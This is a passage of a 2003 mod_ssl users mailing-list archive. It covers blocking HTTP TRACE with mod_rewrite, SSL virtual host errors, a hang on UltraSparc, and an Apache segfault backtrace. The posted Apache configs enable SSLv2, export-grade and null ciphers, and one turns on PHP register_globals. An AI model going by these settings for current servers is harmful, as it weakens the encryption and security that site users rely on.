From owner-modssl-users@modssl.org  Thu Jun 19 01:50:11 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6688BA8974; Thu, 19 Jun 2003 01:50:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mallard.mail.pas.earthlink.net (mallard.mail.pas.earthlink.net [207.217.120.48])
	by master.modssl.org (Postfix) with ESMTP id 12826A8959
	for ; Thu, 19 Jun 2003 01:50:06 +0200 (CEST)
Received: from dewey.psp.pas.earthlink.net ([207.217.78.219])
	by mallard.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 19Smgl-0007FR-00
	for modssl-users@modssl.org; Wed, 18 Jun 2003 16:50:03 -0700
Received: from [207.217.78.15] by EarthlinkWAM via HTTP; Wed Jun 18 16:49:59 PDT 2003
Message-ID: <1419234.1055980202740.JavaMail.nobody@dewey.psp.pas.earthlink.net>
Date: Wed, 18 Jun 2003 16:49:54 -0700 (PDT)
From: rmck 
To: modssl-users@modssl.org
Subject: Virtual Host question?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Earthlink Web Access Mail version 3.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rmck 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I have an apache1.3.27/mod_ssl2.8.12. I was told today I needed to fix this issue with my web server "HTTP TRACE Enabled". 

Now I have module mod_rewrite as a Loaded Module. The fix for this is as follows:

If you are using Apache, add the following lines for each virtual
host in your configuration file :
    RewriteEngine on
    RewriteCond %{REQUEST_METHOD} ^TRACE
    RewriteRule .* - [F]

I'm confused about where to place this in my httpd.conf? 

I have two virtual hosts in my httpd.conf file. Does this look correct, thanks alot for your help:



Redirect / https://host.company.com/
Servername host.company.com
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]




 
#  General setup for the virtual host
DocumentRoot "/opt/apache/htdocs"
ServerName host.company.com
ServerAdmin user@company.com
ErrorLog /opt/apache/logs/error_log
TransferLog /opt/apache/logs/access_log
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]

#   SSL Engine Switch:
#   Enable/Disable SSL for this virtual host.
SSLEngine on
#   SSL Cipher Suite:
#   List the ciphers that the client is permitted to negotiate.
#   See the mod_ssl documentation for a complete list.
SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
/
#     this only for browsers where you know that their SSL implementation
#     works correctly.
#   Notice: Most problems of broken clients are also related to the HTTP
#   keep-alive facility, so you usually additionally want to disable
#   keep-alive for those clients, too. Use variable "nokeepalive" for this.
#   Similarly, one has to force some clients to use HTTP/1.0 to workaround
#   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and
#   "force-response-1.0" for this.
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
 
#   Per-Server Logging:
#   The home of a custom SSL log file. Use this when you want a
#   compact non-error SSL logfile on a virtual host basis.
CustomLog /opt/apache/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
 




Regards,
Rob

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 19 01:55:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 54145A895F; Thu, 19 Jun 2003 01:55:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from flamingo.mail.pas.earthlink.net (flamingo.mail.pas.earthlink.net [207.217.120.232])
	by master.modssl.org (Postfix) with ESMTP id E8F65A8936
	for ; Thu, 19 Jun 2003 01:55:55 +0200 (CEST)
Received: from dewey.psp.pas.earthlink.net ([207.217.78.219])
	by flamingo.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 19SmmP-0001FL-00
	for modssl-users@modssl.org; Wed, 18 Jun 2003 16:55:53 -0700
Received: from [207.217.78.15] by EarthlinkWAM via HTTP; Wed Jun 18 16:55:49 PDT 2003
Message-ID: <8267320.1055980549577.JavaMail.nobody@dewey.psp.pas.earthlink.net>
Date: Wed, 18 Jun 2003 16:55:49 -0700 (PDT)
From: rmck 
To: modssl-users@modssl.org
Subject: Virtual Host question?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Earthlink Web Access Mail version 3.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rmck 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I have an apache1.3.27/mod_ssl2.8.12. I was told today I needed to fix
this issue with my web server "HTTP TRACE Enabled". 

Now I have module mod_rewrite as a Loaded Module. The fix for this is as
follows:

If you are using Apache, add the following lines for each virtual
host in your configuration file :
    RewriteEngine on
    RewriteCond %{REQUEST_METHOD} ^TRACE
    RewriteRule .* - [F]

I'm confused about where to place this in my httpd.conf? 

I have two virtual hosts in my httpd.conf file. Does this look correct,
thanks alot for your help:


-VirtualHost 111.111.111.111-
Redirect / https://host.company.com/
Servername host.company.com
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]
-/VirtualHost-


-VirtualHost _default_:443-
 
#  General setup for the virtual host
DocumentRoot "/opt/apache/htdocs"
ServerName host.company.com
ServerAdmin user@company.com
ErrorLog /opt/apache/logs/error_log
TransferLog /opt/apache/logs/access_log
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]

#   SSL Engine Switch:
#   Enable/Disable SSL for this virtual host.
SSLEngine on
#   SSL Cipher Suite:
#   List the ciphers that the client is permitted to negotiate.
#   See the mod_ssl documentation for a complete list.
SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
/
#     this only for browsers where you know that their SSL implementation
#     works correctly.
#   Notice: Most problems of broken clients are also related to the HTTP
#   keep-alive facility, so you usually additionally want to disable
#   keep-alive for those clients, too. Use variable "nokeepalive" for
this.
#   Similarly, one has to force some clients to use HTTP/1.0 to workaround
#   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0"
and
#   "force-response-1.0" for this.
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
 
#   Per-Server Logging:
#   The home of a custom SSL log file. Use this when you want a
#   compact non-error SSL logfile on a virtual host basis.
CustomLog /opt/apache/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
 
-/VirtualHost-



Regards,
Rob

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 19 04:14:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 05D1CA895F; Thu, 19 Jun 2003 04:14:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id F28F2A8936
	for ; Thu, 19 Jun 2003 04:14:52 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id WAA06471;
	Wed, 18 Jun 2003 22:12:27 -0400
Date: Wed, 18 Jun 2003 22:12:24 -0400 (EDT)
From: "R. DuFresne" 
To: rmck 
Cc: modssl-users@modssl.org
Subject: Re: Virtual Host question?
In-Reply-To: <8267320.1055980549577.JavaMail.nobody@dewey.psp.pas.earthlink.net>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


If you have set this for the entire server as the default, you should not
have to reset it for each virtual host as they should carry the default
unless otherwise conf'ed not to.

Thanks,

Ron DuFresne


On Wed, 18 Jun 2003, rmck wrote:

> Hello,
> 
> I have an apache1.3.27/mod_ssl2.8.12. I was told today I needed to fix
> this issue with my web server "HTTP TRACE Enabled". 
> 
> Now I have module mod_rewrite as a Loaded Module. The fix for this is as
> follows:
> 
> If you are using Apache, add the following lines for each virtual
> host in your configuration file :
>     RewriteEngine on
>     RewriteCond %{REQUEST_METHOD} ^TRACE
>     RewriteRule .* - [F]
> 
> I'm confused about where to place this in my httpd.conf? 
> 
> I have two virtual hosts in my httpd.conf file. Does this look correct,
> thanks alot for your help:
> 
> 
> -VirtualHost 111.111.111.111-
> Redirect / https://host.company.com/
> Servername host.company.com
> RewriteEngine On
> RewriteCond %{REQUEST_METHOD} ^TRACE
> RewriteRule .* - [F]
> -/VirtualHost-
> 
> 
> -VirtualHost _default_:443-
>  
> #  General setup for the virtual host
> DocumentRoot "/opt/apache/htdocs"
> ServerName host.company.com
> ServerAdmin user@company.com
> ErrorLog /opt/apache/logs/error_log
> TransferLog /opt/apache/logs/access_log
> RewriteEngine On
> RewriteCond %{REQUEST_METHOD} ^TRACE
> RewriteRule .* - [F]
> 
> #   SSL Engine Switch:
> #   Enable/Disable SSL for this virtual host.
> SSLEngine on
> #   SSL Cipher Suite:
> #   List the ciphers that the client is permitted to negotiate.
> #   See the mod_ssl documentation for a complete list.
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> /
> #     this only for browsers where you know that their SSL implementation
> #     works correctly.
> #   Notice: Most problems of broken clients are also related to the HTTP
> #   keep-alive facility, so you usually additionally want to disable
> #   keep-alive for those clients, too. Use variable "nokeepalive" for
> this.
> #   Similarly, one has to force some clients to use HTTP/1.0 to workaround
> #   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0"
> and
> #   "force-response-1.0" for this.
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
>  
> #   Per-Server Logging:
> #   The home of a custom SSL log file. Use this when you want a
> #   compact non-error SSL logfile on a virtual host basis.
> CustomLog /opt/apache/logs/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>  
> -/VirtualHost-
> 
> 
> 
> Regards,
> Rob
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 19 15:43:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5C705A895F; Thu, 19 Jun 2003 15:43:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nyffeltrach.thiam.ch (zux172-196.adsl.green.ch [80.254.172.196])
	by master.modssl.org (Postfix) with ESMTP id F1B5AA8936
	for ; Thu, 19 Jun 2003 15:42:58 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by nyffeltrach.thiam.ch (Postfix) with ESMTP id ACA882BEFA
	for ; Thu, 19 Jun 2003 15:36:18 +0200 (CEST)
Received: by nyffeltrach.thiam.ch (Postfix, from userid 10028)
	id 9A36C2BE96; Thu, 19 Jun 2003 15:36:17 +0200 (CEST)
Received: from thiam.ch (limbo.thiam.ch [192.168.0.249])
	by nyffeltrach.thiam.ch (Postfix) with ESMTP id 0643629A98
	for ; Thu, 19 Jun 2003 15:36:17 +0200 (CEST)
Message-ID: <3EF1BF15.6040106@thiam.ch>
Date: Thu, 19 Jun 2003 15:48:05 +0200
From: Akita 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.3) Gecko/20030415
X-Accept-Language: de-ch, de, en-us, en, ja
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Virtual ssl host terminates connection unexpectedly
X-Enigmail-Version: 0.73.1.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
X-Spam-Status: No, hits=-0.8 required=5.0
	tests=AWL,SIGNATURE_SHORT_DENSE,SPAM_PHRASE_00_01,USER_AGENT,
	      USER_AGENT_MOZILLA_UA,X_ACCEPT_LANG
	version=2.44
X-Spam-Level: 
X-Sanitizer: Anomy Sanitizer mail filter
X-Virus-Scanned: by AMaViS 0.3.12
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Akita 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi

I try to set-up a virtuall ssl-host (apache 1.3.27-r3; 
buchhaltung.thiam.ch). However, when I connect to it (Mozilla 1.3), I 
only get the alert:
"The connection to buchhaltung.thiam.ch has terminated unexpectedly. 
Some data may have been transferred."

I don't know, what I mis-configurred (Gentoo Linux).

from apache.conf
----------------
Include conf/commonapache.conf
ServerName www.thiam.ch
LockFile /etc/apache/httpd.lock
# Thiemo Kellner, thiemo@thiam.ch, 2003-04-25
#Include conf/addon-modules/mailman.conf
Include conf/addon-modules/mod_ssl.conf
Include conf/addon-modules/mod_dav.conf
Include conf/addon-modules/mod_gzip.conf
#Include conf/addon-modules/mod_mp3.conf
Include  conf/addon-modules/mod_php.conf

from conf/commonapache.conf
---------------------------
NameVirtualHost *
Include /etc/apache/conf/buchhaltung.conf

conf/addon-modules/mod_ssl.conf
-------------------------------

   Listen 443
   AddType application/x-x509-ca-cert .crt
   AddType application/x-pkcs7-crl    .crl
   SSLPassPhraseDialog  builtin
   SSLSessionCache        shm:logs/ssl_scache(512000)
   SSLSessionCacheTimeout  300
   SSLMutex  sem
   SSLRandomSeed startup builtin
   SSLRandomSeed connect builtin
   SSLLog      logs/ssl_engine_log
   SSLLogLevel info


/etc/apache/conf/buchhaltung.conf
---------------------------------

     Servername buchhaltung.thiam.ch
     ServerAdmin webmaster@thiam.ch
     DocumentRoot /home/httpd/svhosts/buchhaltung
     ErrorLog /var/log/apache/buchhaltung.thiam.ch-error.log
     CustomLog /var/log/apache/buchhaltung.thiam.ch-access.log common
     TransferLog /var/log/apache/buchhaltung.thiam.ch-access.log
     # SSL-Aktivierung
     SSLEngine on
     SSLCipherSuite 
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
     SSLCertificateFile conf/ssl/server.crt
     SSLCertificateKeyFile conf/ssl/server.key
     #SSLCertificateFile /etc/apache/conf/ssl/apache.pem
     SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown
     RewriteEngine On
     RewriteOptions inherit
#    Options +Indexes
#    IndexOptions FancyIndexing
#   
#     DirectoryIndex home.html home.php home.htm home.cgi index.html 
index.php index.htm index.cgi
#   
#    
#      php3_magic_quotes_gpc Off
#      php3_track_vars On
#      php3_include_path .
#    
#    
#      php_flag magic_quotes_gpc Off
#      php_flag track_vars On
#      php_flag register_globals On
#      php_value include_path .
#    

Alias /buchhaltung /home/httpd/svhosts/buchhaltung

         Options +Indexes
         IndexOptions FancyIndexing
         SSLRequireSSL
         SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128
    
      DirectoryIndex home.html home.php home.htm home.cgi index.html 
index.php index.htm index.cgi
    
         
           php3_magic_quotes_gpc Off
           php3_track_vars On
           php3_include_path .
         
         
           php_flag magic_quotes_gpc Off
           php_flag track_vars On
           php_flag register_globals On
           php_value include_path .
         
         order deny,allow
         deny from all
         allow from all


Somebody ideas?

Cheers,

Thiemo

-- 
root ist die Wurzel allen Übels

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 21 04:06:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 80A40A8958; Sat, 21 Jun 2003 04:06:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp02.mrf.mail.rcn.net (smtp02.mrf.mail.rcn.net [207.172.4.61])
	by master.modssl.org (Postfix) with ESMTP id 0F702A8936
	for ; Sat, 21 Jun 2003 04:06:50 +0200 (CEST)
Received: from 209-6-112-18.c3-0.wth-ubr1.sbo-wth.ma.cable.rcn.com ([209.6.112.18] helo=excelsior.weeve.org)
	by smtp02.mrf.mail.rcn.net with smtp (Exim 3.35 #4)
	id 19TXmB-0007Ag-00
	for modssl-users@modssl.org; Fri, 20 Jun 2003 22:06:47 -0400
Date: Fri, 20 Jun 2003 21:59:16 -0400
From: Weeve 
To: modssl-users@modssl.org
Subject: modssl problem on ultrasparc under linux
Message-Id: <20030620215916.76cb8cb5.weeve@gentoo.org>
X-Mailer: Sylpheed version 0.9.0claws (GTK+ 1.2.10; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Weeve 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I'm currently experiencing a problem running modssl on ultrasparc under
linux.  modssl compiles and installs fine but when apache is started with
ssl support, it no longer seems to respond to requests to either port 80
or 443.  Basically you can initiate a tcp connection to the port but once
apache takes over it hangs.  If you start it up without modssl it works
fine.  

I can reproduce this on multiple systems.  

Any thoughts/hints/suggestions?

Thanks,
Weeve

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jun 22 02:15:11 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4B0C1A8958; Sun, 22 Jun 2003 02:15:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp02.mrf.mail.rcn.net (smtp02.mrf.mail.rcn.net [207.172.4.61])
	by master.modssl.org (Postfix) with ESMTP id 0F4F2A8933
	for ; Sun, 22 Jun 2003 02:15:09 +0200 (CEST)
Received: from 209-6-112-18.c3-0.wth-ubr1.sbo-wth.ma.cable.rcn.com ([209.6.112.18] helo=excelsior.weeve.org)
	by smtp02.mrf.mail.rcn.net with smtp (Exim 3.35 #4)
	id 19TsVe-00021T-00
	for modssl-users@modssl.org; Sat, 21 Jun 2003 20:15:06 -0400
Date: Sat, 21 Jun 2003 20:06:22 -0400
From: Weeve 
To: modssl-users@modssl.org
Subject: Re: modssl problem on ultrasparc under linux
Message-Id: <20030621200622.28ea5fd9.weeve@gentoo.org>
In-Reply-To: <20030620215916.76cb8cb5.weeve@gentoo.org>
References: <20030620215916.76cb8cb5.weeve@gentoo.org>
X-Mailer: Sylpheed version 0.9.0claws (GTK+ 1.2.10; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Weeve 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, 20 Jun 2003 21:59:16 -0400
Weeve  wrote:

> I'm currently experiencing a problem running modssl on ultrasparc under
> linux.  modssl compiles and installs fine but when apache is started
> with ssl support, it no longer seems to respond to requests to either
> port 80 or 443.  Basically you can initiate a tcp connection to the port
> but once apache takes over it hangs.  If you start it up without modssl
> it works fine.  


Some follow-up information;

The error logs for apache don't show anything in relation to this problem.
 According to them everything is running fine (both error_log and
ssl-error_log).

I read the FAQ on the site and looked at question
http://www.modssl.org/docs/2.8/ssl_faq.html#ToC20 as it seems to be very
similar to this setup but as far as I can tell I have things setup
correctly.

I'm currently using kernel 2.4.20, gcc-3.2.2 and glibc-2.3.1 to build
this.  

If I build it with gcc-2.95.3 and glibc-2.2.5 it works.

Weeve
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 24 14:45:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D1927A8958; Tue, 24 Jun 2003 14:45:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mxintern.kundenserver.de (mxintern.kundenserver.de [212.227.126.204])
	by master.modssl.org (Postfix) with ESMTP id 94535A8933
	for ; Tue, 24 Jun 2003 14:45:16 +0200 (CEST)
Received: from [172.17.24.2] (helo=snakefarm.org)
	by mxintern.kundenserver.de with esmtp (Exim 3.35 #1)
	id 19UnAf-0006K3-00
	for modssl-users@modssl.org; Tue, 24 Jun 2003 14:45:13 +0200
Message-ID: <3EF847D9.5040409@snakefarm.org>
Date: Tue, 24 Jun 2003 14:45:13 +0200
From: Carsten Gaebler 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3) Gecko/20030314
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Segfaults in Apache 1.3.27 with mod_ssl
Content-Type: multipart/mixed;
 boundary="------------000001010401060900070703"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Carsten Gaebler 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------000001010401060900070703
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi there,

I have a quite busy SSL proxy server which loses child processes due to 
segmentation faults every now and then (i.e. one in about 2 to 6 
minutes). There doesn't seem to be a pattern in the requests that cause 
Apache to fail, so I'm not able to reproduce it intentionally. The core 
dumps suggest that it has something to do with mod_ssl, but since I'm 
not sure I'll post the backtrace here.

My setup is this:

Dual P4 Xeon machine
Debian Linux 3.0 with kernel 2.4.20-ac2
gcc 2.95.4
Apache 1.3.27
mod_ssl-2.8.14-1.3.27
openssl-0.9.7b

A backtrace is attached. I hope that someone can help.

Regards
Carsten.

--------------000001010401060900070703
Content-Type: text/plain;
 name="backtrace.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="backtrace.txt"

GNU gdb 2002-04-01-cvs
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-linux"...
Core was generated by `/usr/local/apache/bin/httpd -DSSL'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libdb2.so.2...done.
Loaded symbols for /lib/libdb2.so.2
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libcrypt.so.1...done.
Loaded symbols for /lib/libcrypt.so.1
Reading symbols from /lib/libdl.so.2...done.
Loaded symbols for /lib/libdl.so.2
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_compat.so.2...done.
Loaded symbols for /lib/libnss_compat.so.2
Reading symbols from /lib/libnsl.so.1...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
Reading symbols from /usr/local/apache/libexec/mod_rewrite.so...done.
Loaded symbols for /usr/local/apache/libexec/mod_rewrite.so
Reading symbols from /usr/local/apache/libexec/libproxy.so...done.
Loaded symbols for /usr/local/apache/libexec/libproxy.so
Reading symbols from /usr/local/apache/libexec/mod_log_config.so...done.
Loaded symbols for /usr/local/apache/libexec/mod_log_config.so
Reading symbols from /usr/local/apache/libexec/mod_log_agent.so...done.
Loaded symbols for /usr/local/apache/libexec/mod_log_agent.so
Reading symbols from /usr/local/apache/libexec/mod_log_referer.so...done.
Loaded symbols for /usr/local/apache/libexec/mod_log_referer.so
Reading symbols from /usr/local/apache/libexec/mod_setenvif.so...done.
Loaded symbols for /usr/local/apache/libexec/mod_setenvif.so
Reading symbols from /usr/local/apache/libexec/libssl.so...done.
Loaded symbols for /usr/local/apache/libexec/libssl.so
Reading symbols from /usr/local/apache/libexec/mod_prctl.so...done.
Loaded symbols for /usr/local/apache/libexec/mod_prctl.so
Reading symbols from /lib/libnss_dns.so.2...done.
Loaded symbols for /lib/libnss_dns.so.2
Reading symbols from /lib/libresolv.so.2...done.
Loaded symbols for /lib/libresolv.so.2
#0  0x40385264 in ssl3_write_pending (s=0xbfffd73c, type=134713128, buf=0x80bf758 "ap::buff::write", len=134861327) at s3_pkt.c:749
749			if (i == s->s3->wbuf.left)
(gdb) where
#0  0x40385264 in ssl3_write_pending (s=0xbfffd73c, type=134713128, buf=0x80bf758 "ap::buff::write", len=134861327) at s3_pkt.c:749
#1  0x00001297 in ?? ()
#2  0x08079f11 in ap_hook_call_func (ap=0xbfffd788, he=0x80bf738, hf=0x80c6518) at ap_hook.c:649
#3  0x08079614 in ap_hook_call (hook=0x809d20f "ap::buff::write") at ap_hook.c:382
#4  0x08053687 in ap_write (fb=0x80c1fe8, buf=0x816af98, nbyte=4738) at buff.c:361
#5  0x0805521f in buff_write (fb=0x80c1fe8, buf=0x816af98, nbyte=4738) at buff.c:408
#6  0x08054674 in write_with_errors (fb=0x80c1fe8, buf=0x816af98, nbyte=4738) at buff.c:1176
#7  0x08054754 in bcwrite (fb=0x80c1fe8, buf=0x816af98, nbyte=4738) at buff.c:1213
#8  0x08054c24 in ap_bwrite (fb=0x80c1fe8, buf=0x816af98, nbyte=4738) at buff.c:1427
#9  0x402e6dc9 in ap_proxy_send_fb (f=0x0, r=0x8165278, c=0x8167890, len=27278, nowrite=0, chunked=0, recv_buffer_size=8192) at proxy_util.c:652
#10 0x402e5c82 in ap_proxy_http_handler (r=0x8165278, c=0x8167890, 
    url=0x816780e "http://s26412026.einsundeinsshop.de/sess/utn153ef84519216ea/shopdata/0190_Sony/0110_Gro=DFbild-TV/images/KV24LS35_200x131.bmp", proxyhost=0x0, proxyport=0)
    at proxy_http.c:750
#11 0x402da946 in proxy_handler (r=0x8165278) at mod_proxy.c:469
#12 0x08055d19 in ap_invoke_handler (r=0x8165278) at http_config.c:518
#13 0x0806bddf in process_request_internal (r=0x8165278) at http_request.c:1308
#14 0x0806be46 in ap_process_request (r=0x8165278) at http_request.c:1324
#15 0x08062620 in child_main (child_num_arg=173) at http_main.c:4689
#16 0x080628ca in make_child (s=0x80b6cc8, slot=173, now=1056457251) at http_main.c:4868
#17 0x08062c58 in perform_idle_server_maintenance () at http_main.c:5050
#18 0x0806322c in standalone_main (argc=2, argv=0xbffffda4) at http_main.c:5287
#19 0x0806389c in main (argc=2, argv=0xbffffda4) at http_main.c:5566
(gdb) 


--------------000001010401060900070703--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 25 17:46:34 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E459AA8947; Wed, 25 Jun 2003 17:46:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id A01E6A8936
	for ; Wed, 25 Jun 2003 17:46:30 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
